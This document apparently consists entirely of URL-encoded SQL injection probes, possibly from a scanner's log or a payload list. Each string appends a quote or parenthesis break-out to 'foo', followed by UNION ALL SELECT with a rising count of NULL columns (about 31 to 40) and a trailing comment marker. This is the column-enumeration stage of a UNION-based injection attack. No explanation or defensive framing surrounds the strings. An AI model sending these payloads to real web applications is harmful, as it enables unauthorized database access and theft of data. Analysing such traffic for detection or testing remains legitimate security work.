foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 